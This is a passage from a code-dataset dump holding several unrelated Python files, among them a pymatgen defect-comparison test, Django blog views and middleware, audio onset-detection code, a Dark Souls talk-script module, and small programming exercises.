sc_scaled_I_vac_sublatt1_defect1))\n self.assertTrue(\n sc_agnostic_pdc.are_equal(identical_I_vacs_sublattice1[0],\n sc_scaled_I_vac_sublatt1_defect1))\n self.assertFalse(pdc.are_equal(identical_I_vacs_sublattice1[1],\n # same coords, different lattice structure\n sc_scaled_I_vac_sublatt1_defect1))\n self.assertTrue(\n sc_agnostic_pdc.are_equal(identical_I_vacs_sublattice1[1],\n sc_scaled_I_vac_sublatt1_defect1))\n self.assertFalse(pdc.are_equal(identical_I_vacs_sublattice1[0],\n # same sublattice, different coords\n sc_scaled_I_vac_sublatt1_defect2))\n self.assertTrue(\n sc_agnostic_pdc.are_equal(identical_I_vacs_sublattice1[0],\n sc_scaled_I_vac_sublatt1_defect2))\n self.assertFalse(\n sc_agnostic_pdc.are_equal(identical_I_vacs_sublattice1[0],\n # different defects (wrong sublattice)\n sc_scaled_I_vac_sublatt2_defect))\n\n # test same structure size, but scaled lattice volume\n # (default is to not allow these to be equal, but check_lattice_scale=True allows for 
this)\n vol_agnostic_pdc = PointDefectComparator(check_lattice_scale=True)\n vol_scaled_s_struc = s_struc.copy()\n vol_scaled_s_struc.scale_lattice(s_struc.volume * 0.95)\n vol_scaled_I_vac_sublatt1_defect1 = Vacancy(vol_scaled_s_struc,\n vol_scaled_s_struc[4])\n vol_scaled_I_vac_sublatt1_defect2 = Vacancy(vol_scaled_s_struc,\n vol_scaled_s_struc[5])\n vol_scaled_I_vac_sublatt2_defect = Vacancy(vol_scaled_s_struc,\n vol_scaled_s_struc[6])\n\n self.assertFalse(pdc.are_equal(identical_I_vacs_sublattice1[0],\n # trivially same defect (but vol change)\n vol_scaled_I_vac_sublatt1_defect1))\n self.assertTrue(\n vol_agnostic_pdc.are_equal(identical_I_vacs_sublattice1[0],\n vol_scaled_I_vac_sublatt1_defect1))\n self.assertFalse(\n pdc.are_equal(identical_I_vacs_sublattice1[0],\n # same defect, different sublattice point (and vol change)\n vol_scaled_I_vac_sublatt1_defect2))\n self.assertTrue(\n vol_agnostic_pdc.are_equal(identical_I_vacs_sublattice1[0],\n vol_scaled_I_vac_sublatt1_defect2))\n self.assertFalse(\n vol_agnostic_pdc.are_equal(identical_I_vacs_sublattice1[0],\n # different defect (wrong sublattice)\n vol_scaled_I_vac_sublatt2_defect))\n\n # test identical defect which has had entire lattice shifted\n shift_s_struc = s_struc.copy()\n shift_s_struc.translate_sites(range(len(s_struc)), [0.2, 0.3, 0.4],\n frac_coords=True, to_unit_cell=True)\n shifted_identical_Cs_vacs = [Vacancy(shift_s_struc, shift_s_struc[0]),\n Vacancy(shift_s_struc, shift_s_struc[1])]\n self.assertTrue(pdc.are_equal(identical_Cs_vacs[0],\n # trivially same defect (but shifted)\n shifted_identical_Cs_vacs[0]))\n self.assertTrue(pdc.are_equal(identical_Cs_vacs[0],\n # same defect on different sublattice point (and shifted)\n shifted_identical_Cs_vacs[1]))\n\n # test uniform lattice shift within non-symmorphic structure\n shift_ns_struc = ns_struc.copy()\n shift_ns_struc.translate_sites(range(len(ns_struc)), [0., 0.6, 0.3],\n frac_coords=True, to_unit_cell=True)\n\n shift_ns_inter_H_sublattice1_set1 = PeriodicSite('H',\n ns_inter_H_sublattice1_set1.frac_coords + [\n 0., 0.6, 0.3],\n shift_ns_struc.lattice)\n shift_ns_inter_H_sublattice1_set2 = PeriodicSite('H',\n ns_inter_H_sublattice1_set2.frac_coords + [\n 0., 0.6, 0.3],\n shift_ns_struc.lattice)\n self.assertTrue(\n pdc.are_equal(Interstitial(ns_struc, ns_inter_H_sublattice1_set1),\n # trivially same defect (but shifted)\n Interstitial(shift_ns_struc,\n shift_ns_inter_H_sublattice1_set1)))\n self.assertTrue(\n pdc.are_equal(Interstitial(ns_struc, ns_inter_H_sublattice1_set1),\n # same defect on different sublattice point (and shifted)\n Interstitial(shift_ns_struc,\n shift_ns_inter_H_sublattice1_set2)))\n\n # test a rotational + supercell type structure transformation (requires check_primitive_cell=True)\n rotated_s_struc = s_struc.copy()\n rotated_s_struc.make_supercell([[2, 1, 0], [-1, 3, 0], [0, 0, 2]])\n rotated_identical_Cs_vacs = [\n Vacancy(rotated_s_struc, rotated_s_struc[0]),\n Vacancy(rotated_s_struc, rotated_s_struc[1])]\n self.assertFalse(pdc.are_equal(identical_Cs_vacs[0],\n # trivially same defect (but rotated)\n rotated_identical_Cs_vacs[0]))\n self.assertTrue(sc_agnostic_pdc.are_equal(identical_Cs_vacs[0],\n rotated_identical_Cs_vacs[0]))\n self.assertFalse(pdc.are_equal(identical_Cs_vacs[0],\n # same defect on different sublattice (and rotated)\n rotated_identical_Cs_vacs[1]))\n self.assertTrue(\n sc_agnostic_pdc.are_equal(identical_Cs_vacs[0],\n # same defect on different sublattice point (and rotated)\n rotated_identical_Cs_vacs[1]))\n\n # test a 
rotational + supercell + shift type structure transformation for non-symmorphic structure\n rotANDshift_ns_struc = ns_struc.copy()\n rotANDshift_ns_struc.translate_sites(range(len(ns_struc)),\n [0., 0.6, 0.3], frac_coords=True,\n to_unit_cell=True)\n rotANDshift_ns_struc.make_supercell([[2, 1, 0], [-1, 3, 0], [0, 0, 2]])\n ns_vac_Cs_set1 = Vacancy(ns_struc, ns_struc[0])\n rotANDshift_ns_vac_Cs_set1 = Vacancy(rotANDshift_ns_struc,\n rotANDshift_ns_struc[0])\n rotANDshift_ns_vac_Cs_set2 = Vacancy(rotANDshift_ns_struc,\n rotANDshift_ns_struc[1])\n\n self.assertTrue(sc_agnostic_pdc.are_equal(ns_vac_Cs_set1,\n # trivially same defect (but rotated and sublattice shifted)\n rotANDshift_ns_vac_Cs_set1))\n self.assertTrue(\n sc_agnostic_pdc.are_equal(ns_vac_Cs_set1,\n # same defect on different sublattice point (shifted and rotated)\n rotANDshift_ns_vac_Cs_set2))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"pymatgen/analysis/tests/test_structure_matcher.py","file_name":"test_structure_matcher.py","file_ext":"py","file_size_in_byte":51429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"276187195","text":"from django.shortcuts import render, get_object_or_404\nfrom django.views import generic\nfrom blog.models import Blog,BlogAuthor,Comment\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\n\nfrom blog.forms import NewCommentForm\n\n# Create your views here.\nclass CommentCreate(LoginRequiredMixin,CreateView):\n model = Comment\n fields = ['comment']\n\nclass BlogAuthorList(generic.ListView):\n model = BlogAuthor\n paginate_by = 5\n\nclass BlogList(generic.ListView):\n model = Blog\n paginate_by = 5\n\nclass BlogAuthorDetail(generic.DetailView):\n model = BlogAuthor\n\nclass BlogDetail(generic.DetailView):\n model = Blog\n\n@login_required\ndef newComment(request,pk):\n blog = get_object_or_404(Blog,pk=pk)\n\n # If this is a POST request then process the Form data\n if request.method == 'POST':\n\n # Create a form instance and populate it with data from the request (binding):\n form = NewCommentForm(request.POST)\n\n #Check if the form is valid:\n if form.is_valid():\n # process the data in form.cleaned_data as required (here we just write it to the model due_back field)\n new_comment = Comment.objects.create(blog=blog,comment=form.cleaned_data['comment'],author=request.user)\n new_comment.save()\n\n # redirect to a new URL\n return HttpResponseRedirect(reverse('blog-detail',args=[str(pk)]))\n \n # If this is a GET (or any other method) create the default form.\n else:\n form = NewCommentForm()\n\n context = {\n 'form': form,\n 'blog': blog,\n }\n\n return render(request,'blog/comment_form.html',context=context)\n\ndef index(request):\n \"\"\"View function for the home site\"\"\"\n \n # The 'all()' is implied by default\n num_authors = BlogAuthor.objects.count()\n\n # Generate counts of some of the main objects\n num_blogs = Blog.objects.all().count()\n\n # The 'all()' is implied by default\n num_comments = Comment.objects.all().count()\n\n # Counter for Posts by Dr. 
Evil\n try:\n num_blogs_dr_evil = Blog.objects.filter(author__name__username__iexact='dr_evil').count()\n except:\n num_blogs_dr_evil = 0\n\n # Number of visits to this view, as counted in the session variable.\n num_visits = request.session.get('num_visits',0)\n request.session['num_visits']=num_visits+1\n\n context = {\n 'num_authors': num_authors,\n 'num_blogs': num_blogs,\n 'num_comments': num_comments,\n 'num_blogs_dr_evil': num_blogs_dr_evil,\n 'num_visits': num_visits,\n }\n\n # Render the HTML template index.html with the data in the context variable\n return render(request, 'index.html', context=context)","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"459933662","text":"import HPC_Paths as p\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport mir_eval\nimport librosa\nimport os\nimport sox\nfrom mir_eval import util\n\ndef onset(unit, start_time,fmin_input,h_length, feature_input):\n start_time = int(start_time)\n if (start_time == 0):\n end_time = 605\n #last start_time for units 1,2,3,5,7\n elif (start_time == 38995):\n if (unit == 1):\n end_time = 39285\n elif (unit == 2):\n end_time = 39301\n elif (unit == 3):\n end_time = 39355\n elif (unit == 5):\n end_time = 39356\n elif (unit == 7):\n end_time = 39295\n #last start_time for unit 10\n elif (start_time == 29395 and unit == 10):\n end_time = 29483\n else:\n end_time = start_time+610\n\n duration_length = end_time - start_time\n\n file = p.get_trimmed_audio(unit) + str(unit).zfill(2) + \"_S_\" + str(start_time) + \"_E_\" + str(end_time) + \".wav\"\n\n y, sr = librosa.load(file, duration=duration_length)\n\n if feature_input == librosa.stft:\n S = feature_input(y, hop_length=h_length, n_fft=2*h_length)\n elif feature_input == librosa.feature.melspectrogram:\n S = feature_input(y, sr=sr, hop_length=h_length, fmin=fmin_input)\n S = librosa.logamplitude(S, ref=1.0)\n\n\n #onset_env = librosa.onset.onset_strength(S=S, aggregate = np.median)\n onset_env = librosa.onset.onset_strength(S=S)\n saveFile = p.get_detections(unit) + str(unit).zfill(2) + \"_S_\" + str(start_time) + \"_E_\" + str(end_time) + \"_detections\"\n checkFile = p.get_data() + str(unit).zfill(2) + \"_S_\" + str(start_time) + \"_E_\" + str(end_time) + \"_detections.npy\"\n np.save(saveFile, onset_env)\n\ndef peak_picking(unit, start_time, hop_duration): #medfilt_size=None):\n start_time = int(start_time)\n if (start_time == 0):\n end_time = 605\n #last start_time for units 1,2,3,5,7\n elif (start_time == 38995):\n if (unit == 1):\n end_time = 39285\n elif (unit == 2):\n end_time = 39301\n elif (unit == 3):\n end_time = 39355\n elif (unit == 5):\n end_time = 39356\n elif (unit == 7):\n end_time = 39295\n #last start_time for unit 10\n elif (start_time == 29395 and unit == 10):\n end_time = 29483\n else:\n end_time = start_time+610\n\n checkFile = p.get_filtered_detections(unit) + str(unit).zfill(2) + \"_S_\" + str(start_time) + \"_E_\" + str(end_time) + \"_detections.npy\"\n li = np.load(checkFile)\n #if medfilt_size is not None:\n #pass # remove me\n # apply scipy.signal.medfilt\n peaks = []\n\n saveFile = p.get_peaks(unit) + str(unit).zfill(2) + \"_S_\" + str(start_time) + \"_E_\" + str(end_time) + \"_peaks\"\n\n\n for i in range(len(li)):\n #first input \n if (i-1<0):\n if (li[i+1] < li[i]):\n #print(li[i],i)\n peaks.append((li[i],(i*hop_duration)))\n #last input\n if ((i+1)==len(li)):\n 
if (li[i-1] < li[i]):\n peaks.append((li[i],(i*hop_duration)))\n #print(li[i],i)\n #middle inputs\n if ((i-1>0) and ((i+1)!=len(li)) and (li[i-1] < li[i]) and (li[i+1] < li[i])):\n peaks.append((li[i],(i*hop_duration)))\n #print(li[i],i)\n\n np.save(saveFile, peaks)\n\ndef threshold(unit, start_time, thresh):\n start_time = int(start_time)\n if (start_time == 0):\n end_time = 605\n #last start_time for units 1,2,3,5,7\n elif (start_time == 38995):\n if (unit == 1):\n end_time = 39285\n elif (unit == 2):\n end_time = 39301\n elif (unit == 3):\n end_time = 39355\n elif (unit == 5):\n end_time = 39356\n elif (unit == 7):\n end_time = 39295\n #last start_time for unit 10\n elif (start_time == 29395 and unit == 10):\n end_time = 29483\n else:\n end_time = start_time+610\n\n checkFile = p.get_peaks(unit) + str(unit).zfill(2) + \"_S_\" + str(start_time) + \"_E_\" + str(end_time) + \"_peaks.npy\"\n threshold_peaks = []\n predicted = []\n groundValues = []\n for i in np.load(checkFile):\n #print(i)\n if (i[0]>=thresh):\n threshold_peaks.append(i)\n predicted.append(i[1]) #+38340)\n\n truth = p.get_trimmed_annotation(unit) + str(unit).zfill(2) + \"_S_\" + str(start_time) + \"_E_\" + str(end_time) + \".txt\"\n\n for line in open(truth,'r'):\n line = line.strip('\\n')\n line = float(line) #- 38340\n groundValues.append(line)\n\n groundValues = np.array(groundValues)\n predicted = np.array(predicted)\n\n\n\n #F, P, R = mir_eval.onset.f_measure(groundValues,predicted) #(reference_onsets, estimated_onsets)\n\n\n Tp = float(len(util.match_events(groundValues, predicted,0.05)))\n Fp = float(len(predicted)) - float(len(util.match_events(groundValues, predicted,0.05)))\n Fn = float(len(groundValues)) - float(len(util.match_events(groundValues, predicted,0.05)))\n\n\n return Tp, Fp, Fn #F, P, R\n","sub_path":"src/python_files/medianfilt_DetectionEvalSourceCode.py","file_name":"medianfilt_DetectionEvalSourceCode.py","file_ext":"py","file_size_in_byte":5053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"138882602","text":"from django.utils.deprecation import MiddlewareMixin\n\n#When gunicorn binds to unix socket, the request.META[\"REMOTE_ADDR\"] is empty.\n#When request.META[\"REMOTE_ADDR\"] is empty, djstripe cannot handle webhooks.\n#This middleware is needed to make sure request.META[\"REMOTE_ADDR\"] is not empty. \n\nclass XForwardedForMiddleware(MiddlewareMixin):\n\n def process_request(self, request):\n if \"HTTP_X_FORWARDED_FOR\" in request.META:\n request.META[\"HTTP_X_PROXY_REMOTE_ADDR\"] = request.META[\"REMOTE_ADDR\"]\n parts = request.META[\"HTTP_X_FORWARDED_FOR\"].split(\",\", 1)\n request.META[\"REMOTE_ADDR\"] = parts[0]\n\n\nimport time, logging\nfrom django.conf import settings\nfrom django.utils.cache import patch_vary_headers\n\n\"\"\"\nhttps://code.djangoproject.com/wiki/MultiHostMiddleware\n\nA simple middleware component that lets you use a single Django instance to serve multiple distinct hosts.\nIMPORTANT!! 
Make sure this is the FIRST entry in your MIDDLEWARE_CLASSES\n\"\"\"\nclass MultiHostMiddleware(MiddlewareMixin):\n\n def process_request(self, request):\n try:\n request.META[\"LoadingStart\"] = time.time()\n host = request.META[\"HTTP_HOST\"]\n #if host[-3:] == \":80\":\n # host = host[:-3] # ignore default port number, if present\n\n # best way to do this.\n host_port = host.split(':')\n if len(host_port)==2: \n host = host_port[0] \n \n if settings.HOST_MIDDLEWARE_URLCONF_MAP[host]:\n request.urlconf = settings.HOST_MIDDLEWARE_URLCONF_MAP[host]\n request.META[\"MultiHost\"] = str(request.urlconf)\n else:\n request.META[\"MultiHost\"] = str(settings.ROOT_URLCONF)\n\n except KeyError:\n pass # use default urlconf (settings.ROOT_URLCONF)\n\n def process_response(self, request, response):\n if 'MultiHost' in request.META:\n response['MultiHost'] = request.META.get(\"MultiHost\")\n\n if 'LoadingStart' in request.META:\n _loading_time = time.time() - int(request.META[\"LoadingStart\"])\n response['LoadingTime'] = \"%.2fs\" % ( _loading_time, )\n\n if getattr(request, \"urlconf\", None):\n patch_vary_headers(response, ('Host',))\n return response\n","sub_path":"propelproject/propelproject/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"232168788","text":"# Assignment: Write a program which finds the largest element in the array \n\nwords = [\"apple\", \"banana\", \"orange\", \"apricot\", \"supercalifragilisticexpialidocious\"]\nnumbers = [1, 4, 23, 103, 567, 1432, 40523, 1000000]\n\ndef find_largest(array):\n length = 0\n item = \"\"\n\n for n in array:\n if len(str(n)) > length:\n length = len(str(n))\n item = n\n \n print(item)\n\n\nfind_largest(words)\nfind_largest(numbers)","sub_path":"Week1/Day4/Day4A2.py","file_name":"Day4A2.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"23552546","text":"# 107. Binary Tree Level Order Traversal II\n# Given a binary tree, return the bottom-up level order traversal of its \n# nodes' values. 
(ie, from left to right, level by level from leaf to root).\n# For example:\n# Given binary tree [3,9,20,null,null,15,7],\n# 3\n# / \\\n# 9 20\n# / \\\n# 15 7\n# [\n# [15,7],\n# [9,20],\n# [3]\n# ]\n\nfrom collections import namedtuple\nfrom collections import deque\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def enQChildren(farther, qtreenode):\n \"\"\"\n :type farther: QTreeNodeItem\n :type qtreenode: deque \n \"\"\"\n if farther != None:\n depth = farther.depth\n if farther.left != None:\n qtreenode_item = QTreeNodeItem(farther.left, depth+1)\n qtreenode.append(qtreenode_item)\n\n if farther.right != None:\n qtreenode_item = QTreeNodeItem(farther.right, depth+1)\n qtreenode.append(qtreenode_item)\n\n def levelOrderBottom(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n QTreeNodeItem = namedtuple('QTreeNodeItem', 'treenode depth')\n rslt = []\n\n if root != None:\n qtreenode = deque()\n qtreenode_item = QTreeNodeItem(root, 1)\n qtreenode.append(qtreenode_item)\n \n while not qtreenode:\n samedepth = []\n cur_depth = qtreenode[0].depth\n \n while not qtreenode and cur_depth == qtreenode[0].depth:\n front = qtreenode.popleft()\n treenode = front.treenode\n samedepth.append(treenode.val)\n enQChildren(front, qtreenode)\n\n rslt.append(samedepth)\n return rslt\n","sub_path":"src/107_e_btLevelOrderTraversal2.py","file_name":"107_e_btLevelOrderTraversal2.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"598825152","text":"#!/usr/bin/env python\n# coding=utf-8\nimport random\nfrom operator import add, sub\ndef play(n):\n count = 0\n for i in range(10):\n a = random.randint(1,(n+1)*10 - 1)\n b = random.randint(1,(n+1)*10 - 1)\n p = [a, b]\n p.sort(reverse=True)\n a, b = p\n ops = {\"+\":add, \"-\":sub}\n d = random.choice([\"+\", \"-\"])\n c = raw_input(\"%d%s%d=\"%(a, d, b))\n if ops[d](a, b) == int(c):\n count += 1\n print (u\"√\")\n else:\n print (u\"×\")\n return count\nfor j in range(10):\n print (u\"第%d关游戏开始,游戏规则,%d内数字相加减\"%(j+1, (j+1)*10))\n ct = play(j)\n if ct >8:\n print (u\"第%d关通过\"%(j+1))\n continue\n else:\n print (u\"第%d关失败\"%(j+1))\n break\n","sub_path":"HelloWorld_python/venv/Include/day3_4.py","file_name":"day3_4.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"310153691","text":"import logging\nimport pickle\nimport re\nfrom collections import OrderedDict\nfrom pathlib import Path\n\nfrom soulstruct.bnd import BND, BNDEntry, BaseBND\nfrom soulstruct.constants.darksouls1.maps import ALL_MAPS\nfrom soulstruct.esd.ds1ptde import ESD as ESD_PTDE\nfrom soulstruct.esd.ds1r import ESD as ESD_DSR\nfrom soulstruct.utilities import PACKAGE_PATH\n\n__all__ = [\"DarkSoulsTalk\", \"TalkESDBND\"]\n_LOGGER = logging.getLogger(__name__)\n\n_TALK_ESD_RE = re.compile(r\"t(\\d+)\\.esd$\")\n_TALK_ESP_RE = re.compile(r\"t(\\d+)\\.esp(\\.py)$\")\n\n\nclass TalkESDBND(object):\n \"\"\"Automatically loads all talk ESDs contained inside given path, or constructs BND from scratch using dictionary\n mapping talk IDs to valid ESD instance sources.\n\n By default, game version is automatically detected using BND paths.\n\n Currently only supported for DS1, hence its placement in this module.\n \"\"\"\n DSR_DCX_MAGIC = (36, 44)\n DS1_BND_PATH_FMT = 
\"N:\\\\FRPG\\\\data\\\\INTERROOT_{version}\\\\script\\\\talk\\\\t{talk_id}.esd\"\n\n bnd: BaseBND\n\n def __init__(self, talkesdbnd_source, game_version=None):\n if game_version not in (None, \"ptde\", \"dsr\"):\n raise ValueError(f\"`game_version` should be 'ptde', 'dsr', or None (to auto-detect), not {game_version}.\")\n if game_version:\n self.esd_class = ESD_DSR if game_version == \"dsr\" else ESD_PTDE\n\n self.talk = OrderedDict()\n self.game_version = game_version\n\n if isinstance(talkesdbnd_source, (str, Path)):\n if talkesdbnd_source.is_file():\n # Single `.talkesdbnd` files. Game version can be detected automatically in this case.\n self.bnd = BND(talkesdbnd_source) # path is remembered in BND\n self.bnd_name = Path(talkesdbnd_source).name\n self.unpack_from_bnd()\n elif talkesdbnd_source.is_dir():\n # Directory of individual ESP files/folders.\n self.bnd_name = \"\"\n if not self.game_version:\n raise ValueError(\"`game_version` must be specified ('ptde' or 'dsr') when loading TalkESDBND from \"\n \"ESP files/folders.\")\n self.bnd = self.get_empty_talkesdbnd()\n self.bnd_name = talkesdbnd_source.name\n self.bnd.dcx = self.DSR_DCX_MAGIC if self.game_version == \"dsr\" else ()\n self.reload_all_esp(talkesdbnd_source, allow_new=True)\n self.update_bnd()\n\n elif isinstance(talkesdbnd_source, dict):\n # Note that `bnd_name` cannot be detected and must be passed to `write()` manually.\n self.bnd_name = \"\"\n if not self.game_version:\n raise ValueError(\"`game_version` must be specified ('ptde' or 'dsr') when loading TalkESDBND from \"\n \"dictionary.\")\n self.bnd = self.get_empty_talkesdbnd()\n self.bnd.dcx = self.DSR_DCX_MAGIC if self.game_version == \"dsr\" else ()\n self.unpack_from_dict(talkesdbnd_source)\n\n def unpack_from_bnd(self):\n self.talk = OrderedDict()\n for entry in self.bnd:\n entry_path = Path(entry.path)\n if self.game_version is None:\n if \"INTERROOT_x64\" in entry.path:\n self.game_version = \"dsr\"\n elif \"INTERROOT_win32\" in entry.path:\n self.game_version = \"ptde\"\n else:\n raise ValueError(f\"Could not detect DS1 version from path: {entry.path}\")\n self.esd_class = ESD_DSR if self.game_version == \"dsr\" else ESD_PTDE\n talk_match = _TALK_ESD_RE.match(entry_path.name)\n if talk_match:\n talk_id = int(talk_match.group(1))\n try:\n self.talk[talk_id] = self.esd_class(entry.data, \"talk\")\n except Exception as e:\n _LOGGER.error(f\"Encountered error when trying to load talk ESD {talk_id}: {e}\")\n raise\n else:\n _LOGGER.warning(f\"Unexpected file in TalkESDBND: {entry_path.name}\")\n\n def unpack_from_dict(self, talk_dict):\n i = 1\n for talk_id, esd_source in talk_dict.items():\n if not isinstance(talk_id, int):\n raise ValueError(\"Keys of `talkesdbnd_source` dict must be integer talk IDs.\")\n try:\n esd = self.esd_class(esd_source)\n except Exception as e:\n _LOGGER.error(f\"Could not interpret ESD source with talk ID {talk_id}. 
Error: {str(e)}\")\n raise\n bnd_path = self.DS1_BND_PATH_FMT.format(\n version=\"x64\" if self.game_version == \"dsr\" else \"win32\", talk_id=talk_id)\n self.talk[talk_id] = esd\n self.bnd.add_entry(BNDEntry(data=esd.pack(), entry_id=i, path=bnd_path))\n i += 1\n\n def __getitem__(self, talk_id):\n return self.talk[talk_id]\n\n def __iter__(self):\n return iter(self.talk)\n\n def __repr__(self):\n return f\"TalkESDBND({repr(self.bnd_name)}): {list(self.talk)}\"\n\n def write_all_esp(self, directory):\n directory = Path(directory)\n directory.mkdir(parents=True, exist_ok=True)\n for talk_id, talk_esd in self.talk.items():\n talk_esd.write_esp(directory / f\"t{talk_id}.esp\")\n\n def reload_all_esp(self, directory, allow_new=True):\n directory = Path(directory)\n for esp_source in directory.glob(\"*.esp*\"):\n talk_match = _TALK_ESP_RE.match(esp_source.name)\n if talk_match:\n talk_id = int(talk_match.group(1))\n if not allow_new and talk_id not in self.talk:\n _LOGGER.warning(\n f\"# WARNING: `allow_new=False` and no talk ID found for ESP source: {esp_source.name}. \"\n f\"Ignoring it.\")\n continue\n try:\n self.talk[talk_id] = self.esd_class(esp_source)\n except Exception as e:\n _LOGGER.error(f\"Could not load talk ESD 't{talk_id}' from ESP source {esp_source.name}. Error: {e}\")\n raise\n\n def update_bnd(self):\n for talk_id, talk_entry in self.talk.items():\n bnd_path = self.DS1_BND_PATH_FMT.format(\n version=\"x64\" if self.game_version == \"dsr\" else \"win32\", talk_id=talk_id)\n if bnd_path in self.bnd.entries_by_path:\n self.bnd.entries_by_path[bnd_path].data = talk_entry.pack()\n else:\n new_id = max([entry.id for entry in self.bnd.entries]) + 1 if self.bnd.entries else 1\n new_entry = BNDEntry(data=talk_entry.pack(), entry_id=new_id, path=bnd_path)\n self.bnd.add_entry(new_entry)\n _LOGGER.debug(f\"New ESD entry added to TalkESDBND: t{talk_id}.esd\")\n\n def write(self, talkesdbnd_path=None):\n self.update_bnd()\n self.bnd.write(talkesdbnd_path)\n\n @classmethod\n def write_from_dict(cls, talk_dict, game_version, talkesdbnd_path):\n \"\"\"Shortcut to immediately load given dictionary and write to given path without pointless BND update.\"\"\"\n talkesdbnd = cls(talk_dict, game_version=game_version)\n talkesdbnd.bnd.write(talkesdbnd_path)\n\n @staticmethod\n def get_empty_talkesdbnd():\n \"\"\"Get empty pickled `.talkesdbnd` file for Dark Souls 1 (either version).\"\"\"\n with PACKAGE_PATH(\"project/resources/empty_talkesdbnd.ds1\").open(\"rb\") as f:\n return pickle.load(f)\n\n\nclass DarkSoulsTalk(object):\n \"\"\"Not actually used by SoulstructProject, but could still be useful for CLI editing.\"\"\"\n\n Depths: TalkESDBND\n UndeadBurg: TalkESDBND # and Undead Parish\n FirelinkShrine: TalkESDBND\n PaintedWorld: TalkESDBND\n DarkrootGarden: TalkESDBND # and Darkroot Basin\n Oolacile: TalkESDBND # and all DLC\n Catacombs: TalkESDBND\n TombOfTheGiants: TalkESDBND\n AshLake: TalkESDBND # and Great Hollow\n Blighttown: TalkESDBND\n LostIzalith: TalkESDBND # and Demon Ruins\n SensFortress: TalkESDBND\n AnorLondo: TalkESDBND\n NewLondoRuins: TalkESDBND # and Valley of Drakes\n DukesArchives: TalkESDBND\n KilnOfTheFirstFlame: TalkESDBND\n UndeadAsylum: TalkESDBND\n\n def __init__(self, talk_directory=None):\n \"\"\"Unpack Dark Souls talk ESD state machines into one single modifiable structure.\n\n Args:\n talk_directory: Directory where all the `.talkesbnd[.dcx]` files are stored. 
This will be inside\n 'script/talk' in your game directory (either version).\n \"\"\"\n self._directory = None\n self._data = {}\n\n if talk_directory is None:\n return\n self._directory = Path(talk_directory)\n if not self._directory.is_dir():\n raise ValueError(\"DarkSoulsTalk should be initialized with the directory containing TalkESDBND files.\")\n\n for game_map in ALL_MAPS:\n talkesdbnd_path = self._directory / (game_map.esd_file_stem + '.talkesdbnd')\n try:\n self._data[game_map.name] = TalkESDBND(talkesdbnd_path)\n setattr(self, game_map.name, self._data[game_map.name])\n except FileNotFoundError:\n raise FileNotFoundError(\n f\"Could not find TalkESDBND file {repr(game_map.esd_file_stem)} \"\n f\"({game_map.name}) in given directory.\")\n\n def __getitem__(self, talkesdbnd_name):\n return self._data[talkesdbnd_name]\n\n def __repr__(self):\n return f\"DarkSoulsTalk({repr(str(self._directory))})\"\n\n def save(self, talk_directory=None):\n if talk_directory is None:\n talk_directory = self._directory\n talk_directory = Path(talk_directory)\n for talkesdbnd in self._data.values():\n talkesdbnd_path = talk_directory / talkesdbnd.bnd.bnd_path.name\n talkesdbnd.write(talkesdbnd_path)\n _LOGGER.info(\"Dark Souls talk ESD files (TalkESDBND) written successfully.\")\n","sub_path":"soulstruct/esd/dark_souls_talk.py","file_name":"dark_souls_talk.py","file_ext":"py","file_size_in_byte":10102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"61958010","text":"import cv2\nimport numpy as np\nimport soundfile as sf\nfrom second_alg_random_poz import load_text_random\nfrom third_alg import make_new_image\nfrom hide_image_in_audio import extract_list\n\n\ndef load_text_in_audio(text, audio_image):\n dictionar_pozitii_text = load_text_random(audio_image, text)\n return audio_image, dictionar_pozitii_text\n\n\ndef get_chr(list_ord):\n message = \"\"\n for elem in list_ord:\n chr_elem = chr(elem)\n message = message + chr_elem\n return message\n\n\ndef extract_text(image, dictionary_poz):\n list_text = list()\n for key, value in dictionary_poz.items():\n r = image[value][0]\n g = image[value][1]\n b = image[value][2]\n list_text.append(r)\n list_text.append(g)\n list_text.append(b)\n text = get_chr(list_text)\n return text\n\n\ndef unload_text_from_audio(image, dictionary_poz):\n txt = extract_text(image, dictionary_poz)\n return txt\n\n\n# text1 = \"Ana are mere.Length of the text should be lower that 256 character.!\"\n# im2 = make_new_image(\"five.wav\")\n# img, pozitii_chr = load_text_in_audio(text1, im2)\n# lista_px = extract_list(img)\n# scaled = np.int16(lista_px/np.max(np.abs(lista_px)) * 32767)\n# sf.write('neext.wav', scaled, 44100)\n# print(unload_text_from_audio(img, pozitii_chr))\n","sub_path":"hide_text_in_audio.py","file_name":"hide_text_in_audio.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"108376776","text":"S = list(input())\nK = int(input())\nN = len(S)\nleft = 1\nwhile left < N and S[0] == S[left]:\n left += 1\nright = 0\nwhile N - 1 - right and S[0] == S[N - 1 - right]:\n right += 1\nS += S\ncnt = 0\nfor i in range(len(S) - 1):\n if S[i + 1] == S[i]:\n S[i + 1] = 'A'\n cnt += 1\nif left + right < N and left % 2 != 0 and right % 2 != 0:\n print(max(0, (cnt + 1) * (K // 2) + ((cnt + 1) // 2) * int(K % 2 != 0) - 1))\nelse:\n 